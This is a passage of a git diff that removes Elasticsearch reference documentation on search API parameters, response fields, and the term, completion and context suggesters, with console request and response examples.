frozen. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_concurrent_shard_requests`:: -(Optional, integer) Defines the number of concurrent shard requests per node -this search executes concurrently. This value should be used to limit the -impact of the search on the cluster in order to limit the number of concurrent -shard requests. Defaults to `5`. - -`pre_filter_shard_size`:: -(Optional, integer) Defines a threshold that enforces a pre-filter roundtrip -to prefilter search shards based on query rewriting if the number of shards -the search request expands to exceeds the threshold. This filter roundtrip can -limit the number of shards significantly if for instance a shard can not match -any documents based on its rewrite method ie. if date filters are mandatory -to match but the shard bounds and the query are disjoint. -When unspecified, the pre-filter phase is executed if any of these conditions is met: - - The request targets more than `128` shards. - - The request targets one or more read-only index. - - The primary sort of the query targets an indexed field. - -[[search-preference]] -`preference`:: -(Optional, string) -Nodes and shards used for the search. By default, {es} selects from eligible -nodes and shards using <>, -accounting for <>. -+ -.Valid values for `preference` -[%collapsible%open] -==== -`_only_local`:: -Run the search only on shards on the local node. - -`_local`:: -If possible, run the search on shards on the local node. If not, select shards -using the default method. - -`_only_nodes:,`:: -Run the search on only the specified nodes IDs. If suitable shards exist on more -than one selected nodes, use shards on those nodes using the default method. If -none of the specified nodes are available, select shards from any available node -using the default method. - -`_prefer_nodes:,`:: -If possible, run the search on the specified nodes IDs. If not, select shards -using the default method. - -`_shards:,`:: -Run the search only on the specified shards. This value can be combined with -other `preference` values, but this value must come first. For example: -`_shards:2,3|_local` - -:: -Any string that does not start with `_`. If the cluster state and selected -shards do not change, searches using the same `` value are routed -to the same shards in the same order. -==== - - -[[search-api-query-params-q]] -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] -+ -You can use the `q` parameter to run a query parameter search. Query parameter -searches do not support the full {es} <> but are handy for -testing. -+ -IMPORTANT: The `q` parameter overrides the <> -parameter in the request body. If both parameters are specified, documents -matching the `query` request body parameter are not returned. - -`request_cache`:: -(Optional, Boolean) If `true`, the caching of search results is enabled for -requests where `size` is `0`. See <>. Defaults to index -level settings. - -`rest_total_hits_as_int`:: -(Optional, Boolean) Indicates whether hits.total should be rendered as an -integer or an object in the rest search response. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -[[search-api-scroll-query-param]] -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. - -[[search-type]] -`search_type`:: -(Optional, string) -How {wikipedia}/Tf–idf[distributed term frequencies] are calculated for -<>. -+ -.Valid values for `search_type` -[%collapsible%open] -==== -`query_then_fetch`:: -(Default) -Distributed term frequencies are calculated locally for each shard running the -search. We recommend this option for faster searches with potentially less -accurate scoring. - -[[dfs-query-then-fetch]] -`dfs_query_then_fetch`:: -Distributed term frequencies are calculated globally, using information gathered -from all shards running the search. While this option increases the accuracy of -scoring, it adds a round-trip to each shard, which can result in slower -searches. -==== - -`seq_no_primary_term`:: -(Optional, Boolean) If `true`, returns sequence number and primary term of the -last modification of each hit. See <>. - -`size`:: -(Optional, integer) Defines the number of hits to return. Defaults to `10`. -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`sort`:: -(Optional, string) A comma-separated list of : pairs. - -`_source`:: -(Optional) -Indicates which <> are returned for matching -documents. These fields are returned in the `hits._source` property of -the search response. Defaults to `true`. -+ -.Valid values for `_source` -[%collapsible%open] -==== -`true`:: -(Boolean) -The entire document source is returned. - -`false`:: -(Boolean) -The document source is not returned. - -``:: -(string) -Comma-separated list of source fields to return. -Wildcard (`*`) patterns are supported. -==== - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -`stats`:: -(Optional, string) Specific `tag` of the request for logging and statistical -purposes. - -`stored_fields`:: -(Optional, string) A comma-separated list of stored fields to return as part -of a hit. If no fields are specified, no stored fields are included in the -response. -+ -If this field is specified, the `_source` parameter defaults to `false`. You can -pass `_source: true` to return both source fields and -stored fields in the search response. - -`suggest_field`:: -(Optional, string) Specifies which field to use for suggestions. - -`suggest_text`:: -(Optional, string) The source text for which the suggestions should be -returned. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] -+ -Defaults to `0`, which does not terminate query execution early. - -`timeout`:: -(Optional, <>) Specifies the period of time to wait -for a response. If no response is received before the timeout expires, the -request fails and returns an error. Defaults to no timeout. - -`track_scores`:: -(Optional, Boolean) If `true`, calculate and return document scores, even if -the scores are not used for sorting. Defaults to `false`. - -`track_total_hits`:: -(Optional, integer or Boolean) -Number of hits matching the query to count accurately. Defaults to `10000`. -+ -If `true`, the exact number of hits is returned at the cost of some performance. -If `false`, the response does not include the total number of hits matching the query. - -`typed_keys`:: -(Optional, Boolean) If `true`, aggregation and suggester names are be prefixed -by their respective types in the response. Defaults to `true`. - -`version`:: -(Optional, Boolean) -If `true`, returns document version as part of a hit. Defaults to `false`. - -[role="child_attributes"] -[[search-search-api-request-body]] -==== {api-request-body-title} - -[[search-docvalue-fields-param]] -`docvalue_fields`:: -(Optional, array of strings and objects) -Array of wildcard (`*`) patterns. The request returns doc values for field names -matching these patterns in the `hits.fields` property of the response. -+ -You can specify items in the array as a string or object. -See <>. -+ -.Properties of `docvalue_fields` objects -[%collapsible%open] -==== -`field`:: -(Required, string) -Wildcard pattern. The request returns doc values for field names matching this -pattern. - -`format`:: -(Optional, string) -Format in which the doc values are returned. -+ -For <>, you can specify a date <>. For <> fields, you can specify a -https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html[DecimalFormat -pattern]. -+ -For other field data types, this parameter is not supported. -==== - -`fields`:: -(Optional, array of strings and objects) -Array of wildcard (`*`) patterns. The request returns values for field names -matching these patterns in the `hits.fields` property of the response. -+ -You can specify items in the array as a string or object. -See <> for more details. -+ -.Properties of `fields` objects -[%collapsible%open] -==== -`field`:: -(Required, string) -Wildcard pattern. The request returns values for field names matching this pattern. - -`format`:: -(Optional, string) -Format in which the values are returned. -+ -The date fields <> and <> accept a -<>. <> accept either -`geojson` for http://www.geojson.org[GeoJSON] (the default) or `wkt` for -{wikipedia}/Well-known_text_representation_of_geometry[Well Known Text]. -+ -For other field data types, this parameter is not supported. -==== - -[[request-body-search-explain]] -`explain`:: -(Optional, Boolean) If `true`, returns detailed information about score -computation as part of a hit. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`indices_boost`:: -(Optional, array of objects) -Boosts the <> of documents from specified indices. -+ -.Properties of `indices_boost` objects -[%collapsible%open] -==== -`: `:: -(Required, float) -`` is the name of the index or index alias. Wildcard (`*`) expressions -are supported. -+ -`` is the factor by which scores are multiplied. -+ -A boost value greater than `1.0` increases the score. A boost value between -`0` and `1.0` decreases the score. -==== - -[[search-api-min-score]] -`min_score`:: -(Optional, float) -Minimum <> for matching documents. Documents with a -lower `_score` are not included in the search results. - -[[request-body-search-query]] -`query`:: -(Optional, <>) Defines the search definition using the -<>. - -[[request-body-search-seq-no-primary-term]] -`seq_no_primary_term`:: -(Optional, Boolean) If `true`, returns sequence number and primary term of the -last modification of each hit. See <>. - -`size`:: -(Optional, integer) The number of hits to return. Defaults to `10`. -+ -By default, you cannot page through more than 10,000 hits using the `from` and -`size` parameters. To page through more hits, use the -<> parameter. - -`_source`:: -(Optional) -Indicates which <> are returned for matching -documents. These fields are returned in the `hits._source` property of -the search response. Defaults to `true`. -+ -.Valid values for `_source` -[%collapsible%open] -==== -`true`:: -(Boolean) -The entire document source is returned. - -`false`:: -(Boolean) -The document source is not returned. - -``:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to return. - -``:: -(object) -Object containing a list of source fields to include or exclude. -+ -.Properties for `` -[%collapsible%open] -===== -`excludes`:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to exclude -from the response. -+ -You can also use this property to exclude fields from the subset specified in -`includes` property. - -`includes`:: -(string or array of strings) -Wildcard (`*`) pattern or array of patterns containing source fields to return. -+ -If this property is specified, only these source fields are returned. You can -exclude fields from this subset using the `excludes` property. -===== -==== - -[[stats-groups]] -`stats`:: -(Optional, array of strings) -Stats groups to associate with the search. Each group maintains a statistics -aggregation for its associated searches. You can retrieve these stats using the -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] -+ -Defaults to `0`, which does not terminate query execution early. - -`timeout`:: -(Optional, <>) Specifies the period of time to wait -for a response. If no response is received before the timeout expires, the -request fails and returns an error. Defaults to no timeout. - -[[request-body-search-version]] -`version`:: -(Optional, Boolean) -If `true`, returns document version as part of a hit. Defaults to `false`. - - -[role="child_attributes"] -[[search-api-response-body]] -==== {api-response-body-title} - -`_scroll_id`:: -(string) -Identifier for the search and its <>. -+ -You can use this scroll ID with the <> to retrieve the -next batch of search results for the request. See -<>. -+ -This parameter is only returned if the <> is specified in the request. - -`took`:: -+ --- -(integer) -Milliseconds it took {es} to execute the request. - -This value is calculated by measuring the time elapsed -between receipt of a request on the coordinating node -and the time at which the coordinating node is ready to send the response. - -Took time includes: - -* Communication time between the coordinating node and data nodes -* Time the request spends in the `search` <>, - queued for execution -* Actual execution time - -Took time does *not* include: - -* Time needed to send the request to {es} -* Time needed to serialize the JSON response -* Time needed to send the response to a client --- - -`timed_out`:: -(Boolean) -If `true`, -the request timed out before completion; -returned results may be partial or empty. - -`_shards`:: -(object) -Contains a count of shards used for the request. -+ -.Properties of `_shards` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of shards that require querying, -including unallocated shards. - -`successful`:: -(integer) -Number of shards that executed the request successfully. - -`skipped`:: -(integer) -Number of shards that skipped the request because a lightweight check -helped realize that no documents could possibly match on this shard. This -typically happens when a search request includes a range filter and the -shard only has values that fall outside of that range. - -`failed`:: -(integer) -Number of shards that failed to execute the request. Note that shards -that are not allocated will be considered neither successful nor failed. -Having `failed+successful` less than `total` is thus an indication that -some of the shards were not allocated. -==== - -`hits`:: -(object) -Contains returned documents and metadata. -+ -.Properties of `hits` -[%collapsible%open] -==== -`total`:: -(object) -Metadata about the number of returned documents. -+ -.Properties of `total` -[%collapsible%open] -===== -`value`:: -(integer) -Total number of returned documents. - -`relation`:: -(string) -Indicates whether the number of returned documents in the `value` -parameter is accurate or a lower bound. -+ -.Values of `relation`: -[%collapsible%open] -====== -`eq`:: Accurate -`gte`:: Lower bound, including returned documents -====== -===== - -`max_score`:: -(float) -Highest returned <>. -+ -This value is `null` for requests that do not sort by `_score`. - -[[search-api-response-body-hits]] -`hits`:: -(array of objects) -Array of returned document objects. -+ -.Properties of `hits` objects -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index containing the returned document. - -`_type`:: -deprecated:[6.0.0, Mapping types are deprecated and will be removed in 8.0. See <>.] -(string) -Mapping type of the returned document. - -`_id`:: -(string) -Unique identifier for the returned document. -This ID is only unique within the returned index. - -[[search-api-response-body-score]] -`_score`:: -(float) -Positive 32-bit floating point number used to determine the relevance of the -returned document. - -[[search-api-response-body-source]] -`_source`:: -(object) -Original JSON body passed for the document at index time. -+ -You can use the `_source` parameter to exclude this property from the response -or specify which source fields to return. - -`fields`:: -+ --- -(object) -Contains field values for the documents. These fields must be specified in the -request using one or more of the following request parameters: - -* <> -* <> -* <> - -This property is returned only if one or more of these parameters are set. --- -+ -.Properties of `fields` -[%collapsible%open] -====== -``:: -(array) -Key is the field name. Value is the value for the field. -====== -===== -==== - -[[search-search-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "term": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -The API returns the following response: - -[source,console-result] ----- -{ - "took": 5, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.3862942, - "hits": [ - { - "_index": "my-index-000001", - "_type" : "_doc", - "_id": "0", - "_score": 1.3862942, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "status_code": 200, - "bytes": 1070000 - }, - "version": "1.1" - }, - "source": { - "ip": "127.0.0.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": $body.took/] diff --git a/docs/reference/search/suggesters.asciidoc b/docs/reference/search/suggesters.asciidoc deleted file mode 100644 index b416bf82a3e..00000000000 --- a/docs/reference/search/suggesters.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[search-suggesters]] -=== Suggesters - -Suggests similar looking terms based on a provided text by using a suggester. -Parts of the suggest feature are still under development. - -[source,console] --------------------------------------------------- -POST my-index-000001/_search -{ - "query" : { - "match": { - "message": "tring out Elasticsearch" - } - }, - "suggest" : { - "my-suggestion" : { - "text" : "tring out Elasticsearch", - "term" : { - "field" : "message" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - - -[[search-suggesters-api-request]] -==== {api-request-title} - -The suggest feature suggests similar looking terms based on a provided text by -using a suggester. The suggest request part is defined alongside the query part -in a `_search` request. If the query part is left out, only suggestions are -returned. - -NOTE: `_suggest` endpoint has been deprecated in favour of using suggest via -`_search` endpoint. In 5.0, the `_search` endpoint has been optimized for -suggest only search requests. - - -[[search-suggesters-api-example]] -==== {api-examples-title} - -Several suggestions can be specified per request. Each suggestion is identified -with an arbitrary name. In the example below two suggestions are requested. Both -`my-suggest-1` and `my-suggest-2` suggestions use the `term` suggester, but have -a different `text`. - -[source,console] --------------------------------------------------- -POST _search -{ - "suggest": { - "my-suggest-1" : { - "text" : "tring out Elasticsearch", - "term" : { - "field" : "message" - } - }, - "my-suggest-2" : { - "text" : "kmichy", - "term" : { - "field" : "user.id" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] -// TEST[s/^/PUT my-index-000001\/_mapping\n{"properties":{"user":{"properties":{"id":{"type":"keyword"}}}}}\n/] - -The below suggest response example includes the suggestion response for -`my-suggest-1` and `my-suggest-2`. Each suggestion part contains -entries. Each entry is effectively a token from the suggest text and -contains the suggestion entry text, the original start offset and length -in the suggest text and if found an arbitrary number of options. - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": ... - "took": 2, - "timed_out": false, - "suggest": { - "my-suggest-1": [ { - "text": "tring", - "offset": 0, - "length": 5, - "options": [ {"text": "trying", "score": 0.8, "freq": 1 } ] - }, { - "text": "out", - "offset": 6, - "length": 3, - "options": [] - }, { - "text": "elasticsearch", - "offset": 10, - "length": 13, - "options": [] - } ], - "my-suggest-2": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] -// TESTRESPONSE[s/"my-suggest-2": \.\.\./"my-suggest-2": "$body.suggest.my-suggest-2"/] - - -Each options array contains an option object that includes the -suggested text, its document frequency and score compared to the suggest -entry text. The meaning of the score depends on the used suggester. The -term suggester's score is based on the edit distance. - -[discrete] -[[global-suggest]] -===== Global suggest text - -To avoid repetition of the suggest text, it is possible to define a -global text. In the example below the suggest text is defined globally -and applies to the `my-suggest-1` and `my-suggest-2` suggestions. - -[source,console] --------------------------------------------------- -POST _search -{ - "suggest": { - "text" : "tring out Elasticsearch", - "my-suggest-1" : { - "term" : { - "field" : "message" - } - }, - "my-suggest-2" : { - "term" : { - "field" : "user" - } - } - } -} --------------------------------------------------- - -The suggest text can in the above example also be specified as -suggestion specific option. The suggest text specified on suggestion -level override the suggest text on the global level. - -include::suggesters/term-suggest.asciidoc[] - -include::suggesters/phrase-suggest.asciidoc[] - -include::suggesters/completion-suggest.asciidoc[] - -include::suggesters/context-suggest.asciidoc[] - -include::suggesters/misc.asciidoc[] diff --git a/docs/reference/search/suggesters/completion-suggest.asciidoc b/docs/reference/search/suggesters/completion-suggest.asciidoc deleted file mode 100644 index e64b7bf99cc..00000000000 --- a/docs/reference/search/suggesters/completion-suggest.asciidoc +++ /dev/null @@ -1,430 +0,0 @@ -[[completion-suggester]] -==== Completion Suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. For more flexible -search-as-you-type searches that do not use suggesters, see the -<>. - -The `completion` suggester provides auto-complete/search-as-you-type -functionality. This is a navigational feature to guide users to -relevant results as they are typing, improving search precision. -It is not meant for spell correction or did-you-mean functionality -like the `term` or `phrase` suggesters. - -Ideally, auto-complete functionality should be as fast as a user -types to provide instant feedback relevant to what a user has already -typed in. Hence, `completion` suggester is optimized for speed. -The suggester uses data structures that enable fast lookups, -but are costly to build and are stored in-memory. - -[[completion-suggester-mapping]] -===== Mapping - -To use this feature, specify a special mapping for this field, -which indexes the field values for fast completions. - -[source,console] --------------------------------------------------- -PUT music -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion" - }, - "title": { - "type": "keyword" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -Mapping supports the following parameters: - -[horizontal] -`analyzer`:: - The index analyzer to use, defaults to `simple`. - -`search_analyzer`:: - The search analyzer to use, defaults to value of `analyzer`. - -`preserve_separators`:: - Preserves the separators, defaults to `true`. - If disabled, you could find a field starting with `Foo Fighters`, if you - suggest for `foof`. - -`preserve_position_increments`:: - Enables position increments, defaults to `true`. - If disabled and using stopwords analyzer, you could get a - field starting with `The Beatles`, if you suggest for `b`. *Note*: You - could also achieve this by indexing two inputs, `Beatles` and - `The Beatles`, no need to change a simple analyzer, if you are able to - enrich your data. - -`max_input_length`:: - Limits the length of a single input, defaults to `50` UTF-16 code points. - This limit is only used at index time to reduce the total number of - characters per input string in order to prevent massive inputs from - bloating the underlying datastructure. Most use cases won't be influenced - by the default value since prefix completions seldom grow beyond prefixes longer - than a handful of characters. - -[[indexing]] -===== Indexing - -You index suggestions like any other field. A suggestion is made of an -`input` and an optional `weight` attribute. An `input` is the expected -text to be matched by a suggestion query and the `weight` determines how -the suggestions will be scored. Indexing a suggestion is as follows: - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest" : { - "input": [ "Nevermind", "Nirvana" ], - "weight" : 34 - } -} --------------------------------------------------- -// TEST - -The following parameters are supported: - -[horizontal] -`input`:: - The input to store, this can be an array of strings or just - a string. This field is mandatory. -+ -[NOTE] -==== -This value cannot contain the following UTF-16 control characters: - -* `\u0000` (null) -* `\u001f` (information separator one) -* `\u001e` (information separator two) -==== - - -`weight`:: - A positive integer or a string containing a positive integer, - which defines a weight and allows you to rank your suggestions. - This field is optional. - -You can index multiple suggestions for a document as follows: - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest": [ - { - "input": "Nevermind", - "weight": 10 - }, - { - "input": "Nirvana", - "weight": 3 - } - ] -} --------------------------------------------------- -// TEST[continued] - -You can use the following shorthand form. Note that you can not specify -a weight with suggestion(s) in the shorthand form. - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest" : [ "Nevermind", "Nirvana" ] -} --------------------------------------------------- -// TEST[continued] - -[[querying]] -===== Querying - -Suggesting works as usual, except that you have to specify the suggest -type as `completion`. Suggestions are near real-time, which means -new suggestions can be made visible by <> and -documents once deleted are never shown. This request: - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nir", <1> - "completion": { <2> - "field": "suggest" <3> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Prefix used to search for suggestions -<2> Type of suggestions -<3> Name of the field to search for suggestions in - -returns this response: - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits": ... - "took": 2, - "timed_out": false, - "suggest": { - "song-suggest" : [ { - "text" : "nir", - "offset" : 0, - "length" : 3, - "options" : [ { - "text" : "Nirvana", - "_index": "music", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "suggest": ["Nevermind", "Nirvana"] - } - } ] - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - - -IMPORTANT: `_source` metadata field must be enabled, which is the default -behavior, to enable returning `_source` with suggestions. - -The configured weight for a suggestion is returned as `_score`. The -`text` field uses the `input` of your indexed suggestion. Suggestions -return the full document `_source` by default. The size of the `_source` -can impact performance due to disk fetch and network transport overhead. -To save some network overhead, filter out unnecessary fields from the `_source` -using <> to minimize -`_source` size. Note that the _suggest endpoint doesn't support source -filtering but using suggest on the `_search` endpoint does: - -[source,console] --------------------------------------------------- -POST music/_search -{ - "_source": "suggest", <1> - "suggest": { - "song-suggest": { - "prefix": "nir", - "completion": { - "field": "suggest", <2> - "size": 5 <3> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Filter the source to return only the `suggest` field -<2> Name of the field to search for suggestions in -<3> Number of suggestions to return - -Which should look like: - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 0, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "suggest": { - "song-suggest": [ { - "text": "nir", - "offset": 0, - "length": 3, - "options": [ { - "text": "Nirvana", - "_index": "music", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "suggest": [ "Nevermind", "Nirvana" ] - } - } ] - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": $body.took,/] - -The basic completion suggester query supports the following parameters: - -[horizontal] -`field`:: The name of the field on which to run the query (required). -`size`:: The number of suggestions to return (defaults to `5`). -`skip_duplicates`:: Whether duplicate suggestions should be filtered out (defaults to `false`). - -NOTE: The completion suggester considers all documents in the index. -See <> for an explanation of how to query a subset of -documents instead. - -NOTE: In case of completion queries spanning more than one shard, the suggest -is executed in two phases, where the last phase fetches the relevant documents -from shards, implying executing completion requests against a single shard is -more performant due to the document fetch overhead when the suggest spans -multiple shards. To get best performance for completions, it is recommended to -index completions into a single shard index. In case of high heap usage due to -shard size, it is still recommended to break index into multiple shards instead -of optimizing for completion performance. - -[[skip_duplicates]] -===== Skip duplicate suggestions - -Queries can return duplicate suggestions coming from different documents. -It is possible to modify this behavior by setting `skip_duplicates` to true. -When set, this option filters out documents with duplicate suggestions from the result. - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nor", - "completion": { - "field": "suggest", - "skip_duplicates": true - } - } - } -} --------------------------------------------------- - -WARNING: When set to true, this option can slow down search because more suggestions -need to be visited to find the top N. - -[[fuzzy]] -===== Fuzzy queries - -The completion suggester also supports fuzzy queries -- this means -you can have a typo in your search and still get results back. - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nor", - "completion": { - "field": "suggest", - "fuzzy": { - "fuzziness": 2 - } - } - } - } -} --------------------------------------------------- - -Suggestions that share the longest prefix to the query `prefix` will -be scored higher. - -The fuzzy query can take specific fuzzy parameters. -The following parameters are supported: - -[horizontal] -`fuzziness`:: - The fuzziness factor, defaults to `AUTO`. - See <> for allowed settings. - -`transpositions`:: - if set to `true`, transpositions are counted - as one change instead of two, defaults to `true` - -`min_length`:: - Minimum length of the input before fuzzy - suggestions are returned, defaults `3` - -`prefix_length`:: - Minimum length of the input, which is not - checked for fuzzy alternatives, defaults to `1` - -`unicode_aware`:: - If `true`, all measurements (like fuzzy edit - distance, transpositions, and lengths) are - measured in Unicode code points instead of - in bytes. This is slightly slower than raw - bytes, so it is set to `false` by default. - -NOTE: If you want to stick with the default values, but - still use fuzzy, you can either use `fuzzy: {}` - or `fuzzy: true`. - -[[regex]] -===== Regex queries - -The completion suggester also supports regex queries meaning -you can express a prefix as a regular expression - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "regex": "n[ever|i]r", - "completion": { - "field": "suggest" - } - } - } -} --------------------------------------------------- - -The regex query can take specific regex parameters. -The following parameters are supported: - -[horizontal] -`flags`:: - Possible flags are `ALL` (default), `ANYSTRING`, `COMPLEMENT`, - `EMPTY`, `INTERSECTION`, `INTERVAL`, or `NONE`. See <> - for their meaning - -`max_determinized_states`:: - Regular expressions are dangerous because it's easy to accidentally - create an innocuous looking one that requires an exponential number of - internal determinized automaton states (and corresponding RAM and CPU) - for Lucene to execute. Lucene prevents these using the - `max_determinized_states` setting (defaults to 10000). You can raise - this limit to allow more complex regular expressions to execute. diff --git a/docs/reference/search/suggesters/context-suggest.asciidoc b/docs/reference/search/suggesters/context-suggest.asciidoc deleted file mode 100644 index cbc027f4f54..00000000000 --- a/docs/reference/search/suggesters/context-suggest.asciidoc +++ /dev/null @@ -1,380 +0,0 @@ -[[context-suggester]] -==== Context Suggester - -The completion suggester considers all documents in the index, but it is often -desirable to serve suggestions filtered and/or boosted by some criteria. -For example, you want to suggest song titles filtered by certain artists or -you want to boost song titles based on their genre. - -To achieve suggestion filtering and/or boosting, you can add context mappings while -configuring a completion field. You can define multiple context mappings for a -completion field. -Every context mapping has a unique name and a type. There are two types: `category` -and `geo`. Context mappings are configured under the `contexts` parameter in -the field mapping. - -NOTE: It is mandatory to provide a context when indexing and querying - a context enabled completion field. - -The following defines types, each with two context mappings for a completion -field: - -[source,console] --------------------------------------------------- -PUT place -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion", - "contexts": [ - { <1> - "name": "place_type", - "type": "category" - }, - { <2> - "name": "location", - "type": "geo", - "precision": 4 - } - ] - } - } - } -} -PUT place_path_category -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion", - "contexts": [ - { <3> - "name": "place_type", - "type": "category", - "path": "cat" - }, - { <4> - "name": "location", - "type": "geo", - "precision": 4, - "path": "loc" - } - ] - }, - "loc": { - "type": "geo_point" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -<1> Defines a `category` context named 'place_type' where the categories must be - sent with the suggestions. -<2> Defines a `geo` context named 'location' where the categories must be sent - with the suggestions. -<3> Defines a `category` context named 'place_type' where the categories are - read from the `cat` field. -<4> Defines a `geo` context named 'location' where the categories are read from - the `loc` field. - -NOTE: Adding context mappings increases the index size for completion field. The completion index -is entirely heap resident, you can monitor the completion field index size using <>. - -[[suggester-context-category]] -[discrete] -===== Category Context - -The `category` context allows you to associate one or more categories with suggestions at index -time. At query time, suggestions can be filtered and boosted by their associated categories. - -The mappings are set up like the `place_type` fields above. If `path` is defined -then the categories are read from that path in the document, otherwise they must -be sent in the suggest field like this: - -[source,console] --------------------------------------------------- -PUT place/_doc/1 -{ - "suggest": { - "input": [ "timmy's", "starbucks", "dunkin donuts" ], - "contexts": { - "place_type": [ "cafe", "food" ] <1> - } - } -} --------------------------------------------------- - -<1> These suggestions will be associated with 'cafe' and 'food' category. - -If the mapping had a `path` then the following index request would be enough to -add the categories: - -[source,console] --------------------------------------------------- -PUT place_path_category/_doc/1 -{ - "suggest": ["timmy's", "starbucks", "dunkin donuts"], - "cat": ["cafe", "food"] <1> -} --------------------------------------------------- - -<1> These suggestions will be associated with 'cafe' and 'food' category. - -NOTE: If context mapping references another field and the categories -are explicitly indexed, the suggestions are indexed with both set -of categories. - - -[discrete] -====== Category Query - -Suggestions can be filtered by one or more categories. The following -filters suggestions by multiple categories: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "place_type": [ "cafe", "restaurants" ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: If multiple categories or category contexts are set on the query -they are merged as a disjunction. This means that suggestions match -if they contain at least one of the provided context values. - -Suggestions with certain categories can be boosted higher than others. -The following filters suggestions by categories and additionally boosts -suggestions associated with some categories: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "place_type": [ <1> - { "context": "cafe" }, - { "context": "restaurants", "boost": 2 } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The context query filter suggestions associated with - categories 'cafe' and 'restaurants' and boosts the - suggestions associated with 'restaurants' by a - factor of `2` - -In addition to accepting category values, a context query can be composed of -multiple category context clauses. The following parameters are supported for a -`category` context clause: - -[horizontal] -`context`:: - The value of the category to filter/boost on. - This is mandatory. - -`boost`:: - The factor by which the score of the suggestion - should be boosted, the score is computed by - multiplying the boost with the suggestion weight, - defaults to `1` - -`prefix`:: - Whether the category value should be treated as a - prefix or not. For example, if set to `true`, - you can filter category of 'type1', 'type2' and - so on, by specifying a category prefix of 'type'. - Defaults to `false` - -NOTE: If a suggestion entry matches multiple contexts the final score is computed as the -maximum score produced by any matching contexts. - -[[suggester-context-geo]] -[discrete] -===== Geo location Context - -A `geo` context allows you to associate one or more geo points or geohashes with suggestions -at index time. At query time, suggestions can be filtered and boosted if they are within -a certain distance of a specified geo location. - -Internally, geo points are encoded as geohashes with the specified precision. - -[discrete] -====== Geo Mapping - -In addition to the `path` setting, `geo` context mapping accepts the following settings: - -[horizontal] -`precision`:: - This defines the precision of the geohash to be indexed and can be specified - as a distance value (`5m`, `10km` etc.), or as a raw geohash precision (`1`..`12`). - Defaults to a raw geohash precision value of `6`. - -NOTE: The index time `precision` setting sets the maximum geohash precision that -can be used at query time. - -[discrete] -====== Indexing geo contexts - 